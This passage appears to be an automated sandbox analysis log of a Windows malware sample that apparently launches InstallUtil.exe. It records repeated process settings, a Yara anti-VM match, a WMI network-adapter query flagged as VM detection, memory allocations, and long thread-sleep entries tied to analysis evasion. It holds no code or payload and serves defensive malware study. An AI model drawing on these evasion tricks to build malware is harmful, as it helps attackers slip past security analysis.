Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: wva4mZuUb4.exe PID: 7312, type: MEMORYSTR

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Memory allocated: 1370000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Memory allocated: 2DA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Memory allocated: 4DA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Memory allocated: 7D50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Memory allocated: 8D50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Memory allocated: 8F10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Memory allocated: 9F10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Memory allocated: A280000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Memory allocated: 7D50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2C10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2E50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2D50000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596046	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595718	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594843	Jump to behavior

Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Window / User API: threadDelayed 1516	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe	Window / User API: threadDelayed 8332	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 1375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 8488	Jump to behavior

Source: C:\Users\user\Desktop\wva4mZuUb4.exe TID: 7824	Thread sleep time: -28592453314249787s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wva4mZuUb4.exe TID: 7824	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3180	Thread sleep count: 1375 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3180	Thread sleep count: 8488 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -25825441703193356s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -599218s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -599000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -598890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -598781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -598672s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -598562s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -598453s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -598343s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -598234s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -598125s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -598015s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -597906s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -597796s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -597687s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -597578s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -597468s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -597359s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -597250s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -597140s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -597031s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -596921s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -596812s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -596703s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -596593s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -596484s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -596375s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -596265s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -596156s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -596046s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -595937s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -595828s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -595718s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -595609s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -595500s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -595390s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -595281s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1424	Thread sleep time: -595172s >= -30000s	Jump to behavior
